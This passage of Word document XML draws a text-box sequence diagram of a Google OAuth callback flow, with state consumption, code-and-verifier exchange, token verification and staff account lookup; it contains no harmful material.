                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>│◄────────────────────────────────────────────────────────┤</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2451" name="Rectangle 2451"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="3250642"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7DD4B99F"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2" name="Rectangle 2452"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="3250642"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4E9B7C2F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>│                            │                            │</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2453" name="Rectangle 2453"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="3422092"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6C6EEC57"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4" name="Rectangle 2454"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="3422092"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6AB51A41" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">│ 5. POST /auth/google/callback {code, </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">state}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5" name="Rectangle 2455"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="3593542"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="320057B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6" name="Rectangle 2456"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="3593542"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="502D3EC6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>├───────────────────────────►│                            │</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2457" name="Rectangle 2457"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="3764992"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6669CD71"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8" name="Rectangle 2458"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="3764992"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5D0F6BFA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>│                            │ consume state (</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">delete)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59" name="Rectangle 2459"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="3936442"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3D69EC6D"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60" name="Rectangle 2460"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="3936442"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4AEF6426" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">│                            │ 6. exchange </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>code+</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>verifier</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">  │</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2461" name="Rectangle 2461"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="4107892"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="626FB60A"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62" name="Rectangle 2462"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="4107892"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="20F2085A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>│                            ├───────────────────────────►│</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2463" name="Rectangle 2463"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="4279342"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5DC694B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64" name="Rectangle 2464"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="4279342"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="28367720" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>│                            │ 7. {</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>id_token</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>, …}           │</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2465" name="Rectangle 2465"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="4450792"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1CC7336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66" name="Rectangle 2466"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="4450792"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4BABD02C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>│                            │◄───────────────────────────┤</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2467" name="Rectangle 2467"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="4622242"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="47AF3F5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68" name="Rectangle 2468"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="4622242"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0F8AF2A0" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">│                            │ 8. VERIFY (8 </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">checks)   </w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>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69" name="Rectangle 2469"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="4793692"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3E48D33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70" name="Rectangle 2470"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="4793692"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="50536469" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">│                            │ 9. resolve staff </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>account   │</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2471" name="Rectangle 2471"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="4965142"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7025C40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72" name="Rectangle 2472"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="4965142"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4845DE30"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no auto-</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>provisioning)  │</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2473" name="Rectangle 2473"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="5146117"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5F92102C"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74" name="Rectangle 2474"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="5146117"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="25A8F47F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">│ 10. {user, </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">token}   </w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">       │                            │</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2475" name="Rectangle 2475"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="5317567"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="074F8F28"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476" name="Rectangle 2476"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="5317567"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="648A15A9" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>│◄───────────────────────────┤                            │</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="1AA676EB" id="Group 28632" o:spid="_x0000_s1297" style="width:510.25pt;height:435.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="64801,5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ImiwkAACN8AAAOAAAAZHJzL2Uyb0RvYy54bWzkXW2vozYW/l5p/wPK951gY96iuVNt2+1o&#10;paqt2tkfwOWSm0gEIuC+TH/9Htv44Nyc6RAq1Wg9HyZcsME+j5/z8oTA+29fT3XwXHX9sW3uNuxd&#10;uAmqpmwfjs3j3ea/n378Z7YJ+qFoHoq6baq7zeeq33z74R/fvH857yreHtr6oeoCOEnT717Od5vD&#10;MJx3221fHqpT0b9rz1UDB/dtdyoG+LN73D50xQuc/VRveRgm25e2ezh3bVn1Pez9QR/cfFDn3++r&#10;cvhlv++rIajvNjC2Qf3fqf/v5f/bD++L3WNXnA/HchxGsWAUp+LYwEXxVD8UQxE8dcerU52OZdf2&#10;7X54V7anbbvfH8tKzQFmw8I3s/nYtU9nNZfH3cvjGc0Epn1jp8WnLX9+/tidfz//2oElXs6PYAv1&#10;l5zL6747yU8YZfCqTPYZTVa9DkEJOxORhYwnm6CEY3EciZDH2qjlASx/1a88/PsrPbfmwtuL4byc&#10;YYH0kw36v2aD3w/FuVKm7Xdgg1+74Phwt+FRxjdBU5xgpaoWgdqjTKPaoaH6XQ82+6tWwrkWu/Kp&#10;Hz5WrTJ48fxTP+iV+WC2ioPZKl8bs9nB+v7TlX0uBtlPjlNuBi8WYocJMHn81D5Xn1rVcpCwsTyM&#10;gTEGchjq1KJu7JaJSFKRiou2pkX5dH8sv6v+uGyfhmHIpvYwOHXJRKRcRPqiIhN6HeEhkSb6GkxE&#10;uTwGQ7o8vbmo6TIuTbkyQ87HLqaR+SQaxzzLc+Ub4BKmnfk07WHK43hg2fM4eXv+y6FhL5wg9Ipi&#10;riZizR8No7jEoksbTHa2qPYVM0w4XvYx86HGyZKYa1sTw2AizPHg2ykwliYaQOhpWeXyKpd/advk&#10;QroR7UVYDFdQBNDH0ijBYyFnmX0sjjNzQZ4JofpdmYS6YJTm0XhBnsAatk/KBUvNMRFnqX2MiZEX&#10;ccw5j5W7u7qgsa4evxkgE3lq2psW5tNuqTHTS9wcN5+6HQ4CDC7enpKaLc4oF5erCs2QRnouZjVa&#10;hk1ovlHXQaiiNLtYvYgvF+GFracl80ViUxealuEbVzEt3jG8jxa78meXZy3rtq+0yaWrVO4F3afC&#10;d3LQdSM9KaBaFpCz7OtiUMH/dBwgmamPJ/CeXPo4uWyga93AhwxgOmaoreFzXUlnWze/VXsIPirA&#10;yh1993j/fd0Fz4VMWdQ/dfKiPh+Kce943rHpeA04j+y/P9Y1npKprhenZCH/Ti92GNnYWParVLaE&#10;PUPdsxxHo1MmSDxg0iZxgv7YSV25bQbs30C6p4ZpzVZu3rcPn1WyoQwCEV2mHX9HaBcsNqH9Nwib&#10;RfNYVwGwQpFHDgHSgK+HdxaGaaxdA1AwDkc3ZdIhGb/gqEyGWBTCihuRMqnU